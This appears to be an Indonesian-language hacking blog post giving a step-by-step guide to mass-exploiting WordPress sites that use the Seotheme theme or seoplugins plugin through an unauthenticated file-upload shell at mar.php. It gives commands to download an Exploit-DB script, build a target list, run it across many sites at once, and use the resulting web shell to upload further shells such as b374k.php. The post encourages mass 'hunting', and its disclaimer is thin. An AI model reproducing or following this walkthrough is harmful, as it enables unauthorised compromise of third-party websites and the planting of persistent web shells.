Wordpress Seotheme - Remote Code Execution Unauthenticated

6ickzone 0
Wordpress Seotheme - Remote Code Execution Unauthenticated

Wordpress Seotheme - Remote Code Execution Unauthenticated

⚠️This article is intended solely for educational purposes only.The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this.

🔎 Step 1: Kenali Target Vulnerable

Exploit ini mentarget:

  • /wp-content/themes/seotheme/mar.php
  • /wp-content/plugins/seoplugins/mar.php

Shell-nya udah include dalam script, jadi saat endpoint itu aktif, otomatis bisa upload file via form PHP.

⚙️ Step 2: Siapkan Alat

  • Python2 (bukan Python3!)
  • File mar.py (isi exploit-nya)
  • File vuln.txt yang berisi daftar URL target

Install Python2 (Linux):

sudo apt install python2

📥 Step 3: Ambil Script Exploit-nya

Download exploit:

wget https://www.exploit-db.com/download/51789 -O mar.py

Atau bisa copy-paste dari Exploit-DB: https://www.exploit-db.com/exploits/51789 manual ke file mar.py

📝 Step 4: Buat Daftar Target

Isi vuln.txt dengan satu URL per baris, contoh:

http://target1.com

https://target2.com

http://site.target3.com

🚀 Step 5: Jalankan Exploit

Jalankan scriptnya:

python2 mar.py vuln.txt

Hasilnya akan kelihatan di terminal. Jika berhasil, akan muncul:

-| http://target.com --> [Successfully]

URL shell akan otomatis disimpan di:

  • seotheme-Shells.txt
  • seoplugins-Shells.txt

🧪 Step 6: Tes Shell-nya

Buka salah satu URL yang berhasil, contoh:

http://target.com/wp-content/themes/seotheme/mar.php

Akan muncul shell mini seperti ini:

  • Info system
  • Form upload file (.php, .txt, dll)

📤 Step 7: Upload Shell atau Script Lain

Gunakan form yang tersedia untuk upload file apa pun dari lokal ke server target.

Contoh upload: b374k.php, mini-shell.php, atau sclu.html

🧹 Step 8: Bersihkan atau Amankan (Opsional)

Kalau kamu cuma testing atau nge-audit, jangan lupa hapus shell atau kasih akses terbatas. Ethical hacking harus tanggung jawab brok 🤝

📌 Catatan Tambahan

  • Script ini multi-threaded pakai Pool(100), jadi cepat buat banyak target
  • Dia pakai signature dari image eksternal buat cek apakah shell berhasil jalan
  • Masih banyak yang make SEOtheme lawas, jadi lumayan buat hunting massal 👀

"Where creativity, exploitation, and expression collide." — 6ickZone

6ickzone

I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.

Post a Comment

Posting Komentar

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About